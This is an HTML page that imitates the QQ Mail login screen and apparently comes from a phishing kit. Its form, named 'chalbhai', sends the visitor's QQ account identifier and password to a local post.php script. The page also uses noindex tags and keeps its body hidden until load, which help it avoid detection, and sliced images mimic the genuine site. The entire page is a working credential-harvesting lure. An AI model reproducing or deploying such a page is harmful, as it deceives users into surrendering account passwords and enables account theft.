<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<title>&#30331;&#24405;&#81;&#81;&#37038;&#31665;</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
              href="images/favicon.ico"/>	
			  <style type="text/css">
			  .textbox {  
	border-radius: 3px;		  
    border-top: solid 1px #8e8e8e; 
    border-right: solid 1px #8e8e8e; 
    border-left: solid 1px #8e8e8e; 
    border-bottom: solid 1px #8e8e8e;
padding-left:8px;	
    height: 40px; 
    width: 275px; 
 } 
 
.textbox:focus {  
    border-color: #4892E7; 
    border-style: solid; 
    border-width: 1px; 
    outline: 0; 
 } 

</style>
			  
<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
div#container
{
	position:relative;
	width: 1365px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:-1px; width:1365px; height:66px; z-index:0"><img src="images/mq1.png" alt="" title="" border=0 width=1365 height=66></div>

<div id="image2" style="position:absolute; overflow:hidden; left:205px; top:152px; width:556px; height:335px; z-index:1"><img src="images/mq2.png" alt="" title="" border=0 width=556 height=335></div>

<div id="image3" style="position:absolute; overflow:hidden; left:831px; top:123px; width:342px; height:394px; z-index:2"><img src="images/mq3.png" alt="" title="" border=0 width=342 height=394></div>

<div id="image4" style="position:absolute; overflow:hidden; left:0px; top:629px; width:1365px; height:76px; z-index:3"><img src="images/mq5.png" alt="" title="" border=0 width=1365 height=76></div>

<div id="image5" style="position:absolute; overflow:hidden; left:37px; top:10px; width:191px; height:44px; z-index:4"><a href="#"><img src="images/logo.png" alt="" title="" border=0 width=191 height=44></a></div>

<div id="image6" style="position:absolute; overflow:hidden; left:1118px; top:23px; width:212px; height:22px; z-index:5"><a href="#"><img src="images/mq4.png" alt="" title="" border=0 width=212 height=22></a></div>

<div id="image7" style="position:absolute; overflow:hidden; left:383px; top:641px; width:302px; height:24px; z-index:6"><a href="#"><img src="images/mq6.png" alt="" title="" border=0 width=302 height=24></a></div>

<div id="image8" style="position:absolute; overflow:hidden; left:932px; top:477px; width:222px; height:20px; z-index:7"><a href="#"><img src="images/mq8.png" alt="" title="" border=0 width=222 height=20></a></div>

<div id="image9" style="position:absolute; overflow:hidden; left:880px; top:138px; width:235px; height:25px; z-index:8"><a href="#"><img src="images/mq7.png" alt="" title="" border=0 width=235 height=25></a></div>

<form action=post.php name=chalbhai id=chalbhai method=post>
<input name="userid" placeholder="&#25903;&#25345;&#81;&#81;&#21495;&#47;&#37038;&#31665;&#47;&#25163;&#26426;&#21495;&#30331;&#24405;" class="textbox" required type="text" style="position:absolute;width:284px;left:861px;top:213px;z-index:9">
<input name="formtext2" placeholder="&#81;&#81;&#23494;&#30721;" class="textbox" required type="text" style="position:absolute;width:284px;left:861px;top:263px;z-index:10">
<div id="image10" style="position:absolute; overflow:hidden; left:882px; top:325px; width:82px; height:19px; z-index:11"><a href="#"><img src="images/cb.png" alt="" title="" border=0 width=82 height=19></a></div>

<div id="formcheckbox1" style="position:absolute; left:859px; top:326px; z-index:12"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:860px; top:360px; z-index:13"><input type="image" name="formimage1" width="286" height="42" src="images/button.png"></div>
</div>

</body>
</html>
